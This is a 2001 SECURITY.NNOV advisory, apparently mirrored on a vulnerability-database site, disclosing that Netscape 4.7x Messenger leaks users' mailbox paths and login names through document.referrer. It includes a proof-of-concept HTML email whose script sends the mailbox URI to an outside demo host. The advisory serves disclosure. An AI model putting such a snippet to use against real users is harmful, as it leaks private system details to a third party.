Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:1687
HistoryJun 05, 2001 - 12:00 a.m.

SECURITY.NNOV: Netscape 4.7x Messanger user information retrival

2001-06-0500:00:00
vulners.com
34
JSON

There are known bugs in Netscape which require information on user's
files location. This bug is not serious one, but it allows to get this
location.

Topic : Netscape 4.7x user information retrival
Author : 3APA3A <[email protected]>
Affected software : Netscape 4.7x All Platforms
Vendor : Netscape (IPlanet)
Risk : Low
Remotely Exploitable : Yes
Released : 30 May 2001
Vendor URL : http://www.netscape.com
SECURITY.NNOV advisories: http://www.security.nnov.ru/advisories

Background:

Netscape Messanger uses internal protocol called mailbox://. The
format of mailbox URI is

mailbox://full_path_to_user_folder?ID=some_message_d&number=somenumber

this URI contains full path to user's mailbox which usually contains
user's login name and in case of Windows 9x - the path to Netscape
installation. It's impossible to determine this location from
javascript inside e-mail message, because Netscape hides
document.location from javascript.

Problem:

It's possible to retrieve mailbox:// URI of the message. E.g., it's
possible to retrieve mailbox location, user's system login and in some
cases path to Netscape installation.

Details:

When link invoked from message, Netscape sets "document.referrer"
property to URI of the message contained this link. Javascript on the
target page is able to retrieve this property and pass it to any
location together with IP of calling machine.

Exploitation:

If you read this message with Netscape Messanger you can simply click
reference http://www.security.nnov.ru/files/nsdemo.asp to see your
mailbox location or you can force Netscape user to open this page with
message like this:

-=-=-=-=-=-=-=-=-=-
From: 3APA3A
To: 3APA3A
Subject: Test your Netscape
Content-Type: text/html

<html><script>
window.open('http://www.security.nnov.ru/files/nsdemo.asp?&#39;+escape&#40;document.location&#41;&#41;;
</script>
<A
HREF="http://www.security.nnov.ru/files/nsdemo.asp&quot;
>
http://www.security.nnov.ru/files/nsdemo.asp
</A>
</html>
-=-=-=-=-=-=-=-=-=-

Vendor:

Netscape was contacted May, 30 2001 via
http://help.netscape.com/forms/bug-security.html
No feedback were given.


http://www.security.nnov.ru
/\_/\
{ . . } |\
±-oQQo->{ ^ }<-----+ \
| 3APA3A U 3APA3A }
±------------o66o–+ /
|/
You know my name - look up my number (The Beatles)

JSON